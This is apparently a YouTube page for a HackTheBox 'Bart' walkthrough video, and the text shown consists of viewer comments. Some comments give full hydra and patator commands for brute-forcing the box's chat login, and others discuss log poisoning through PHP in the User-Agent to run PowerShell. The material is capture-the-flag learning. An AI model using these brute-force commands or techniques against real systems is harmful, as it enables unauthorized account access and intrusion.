HackTheBox - Bart

Рет қаралды 32,939

IppSec

Күн бұрын

Пікірлер: 63

@pswalia2u 3 жыл бұрын

Hashcat: cracking Hashes with salts :) is just awsome!

@shankaranarayana6568 4 жыл бұрын

You can use regular expressions in hydra to capture multiple failure cases. Something like hydra -l harvey -P /usr/share/wordlists/rockyou.txt internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&passwd=^PASS^&submit=Login:Invalid Username or Password|The Password must be at least 8 characters"

@shankaranarayana6568 4 жыл бұрын

But this way you will have to makes sure you capture all possible error messages. I missed out the "password is required" error message earlier on. But not sure why hydra makes an attempt without a password.

@shankaranarayana6568 4 жыл бұрын

The final command that worked is hydra -l harvey -P /usr/share/metasploit-framework/data/wordlists/common_roots.txt internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&passwd=^PASS^&submit=Login:Invalid Username or Password|The Password must be at least 8 characters|The Password is required"

@robinhellsten8903 6 жыл бұрын

Patator equivalent of the hydra stuff: patator http_fuzz url=internal-01.bart.htb/simple_chat/login.php method=POST body='uname=harvey&passwd=FILE0&submit=Login' 0=/usr/share/wordlists/metasploit/common_roots.txt -x ignore:size=365

@abhishekchaudhari970 6 жыл бұрын

Thanks ...keep it going..we are learning A lot from you 😘

@letsberealq 6 жыл бұрын

Thanks for this. I started the box right before it retired. Also for hydra post-form example you can use hydra -U http-post-form and it spits out formats. You should consider patreon id support it for your work.

@ippsec 6 жыл бұрын

I’ve considered it, in the end I just don’t want to deal with being obligated to do videos/answer questions/etc. It becomes actual work once I accept money, and work tends to not be as fun.

@letsberealq 6 жыл бұрын

totally get that. Thanks for all that you do!

@_crys_ 6 жыл бұрын

Great vid! On this box, you can also use Powershell's Invoke-Command to run commands as the admin, the catch is that you have to do -ComputerName 127.0.0.1 for it to work. Also, maybe you can do Enter-PSSession as well, but that shell was a bit funky for me, as it didn't execute anything, just kept giving me the prompt.

@gazcbm 6 жыл бұрын

Confused how the leap was made from the log poisoning using php in the user agent to adding a new parameter with powershell

@ippsec 6 жыл бұрын

A new parameter wasn't added with powershell, The web application was written in PHP and PHP Code was placed in the log file. The PHP Code pulled a new variable from the URL and executed it, that's where the powershell was placed.

@gazcbm 6 жыл бұрын

IppSec sorry yes I meant a new url parameter that contained a powershell command to be executed. In the video the php code was running whoami from the UA string, you then replaced the UA string with generic text and added &pleasesubscribe=(powershell stuff here)

@ippsec 6 жыл бұрын

At 34:10, the php code accepts any command.

@gazcbm 6 жыл бұрын

IppSec yep there it is! Missed that completely, makes sense. Thanks dude

@blackcat.mb.999 6 жыл бұрын

I love all your videos :)

@fsacer 6 жыл бұрын

Sysnative is a virtual folder, a special alias, that can be used to access the 64-bit System32 folder from a 32-bit application or script. That's why it won't be displayed cause it's alias and not a real folder. Maybe you could've run the 64-bit PowerShell from start but don't think I've explored that, irc I've run 64-bit meterp

@chefsputnik1 6 жыл бұрын

Aliases have always been visible both via explorer and cmd. 'Sysnative' is a HIDDEN alias, another stupid M$ peculiarity.

@d4rkz3n64 6 жыл бұрын

Nice bro! One hint: use the parcellite to save the history of ctrl+c to facilitate.

@rubyrose6869 6 жыл бұрын

Our race needs more beings like you

@franciscog7110 6 жыл бұрын

Nice video, I had all to finish this machinebut failed logging as admin with autologon creds. It was a fun machine. By the way why dont you use the burp extension CSRF Token Tracker or if you feeling fancy using burpsession macro? No need for scripting and itsfcrazy fast to use. Nice channel kudos

@ippsec 6 жыл бұрын

I believe that’s a paid feature and I try to stick with free stuff so everyone can follow along

@yassineamor9300 6 жыл бұрын

Thank you for these contributions you make to the community, IppSec. Would you mind sharing the path you took to gain these skills? Any formal education? Online courses? Certs?

@ippsec 6 жыл бұрын

Primarily years as a sysadmin and just playing around with things to figure out how they worked.

@pjsmith4471 6 жыл бұрын

to force your browser to dont use the cache make a shift+f5

@adamziane 6 жыл бұрын

You should write a book

@Flyingnobull 6 жыл бұрын

Ipp, what are you looking for when looking through the page code in 10th minute?

@zn1x.gaming 6 жыл бұрын

Can you please share the list of scripts that you have under /opt ?

@ippsec 6 жыл бұрын

Sorry. Don’t make that public, changes weekly and don’t want to risk accidentally uploading something like an empire database that contains creds to rastalabs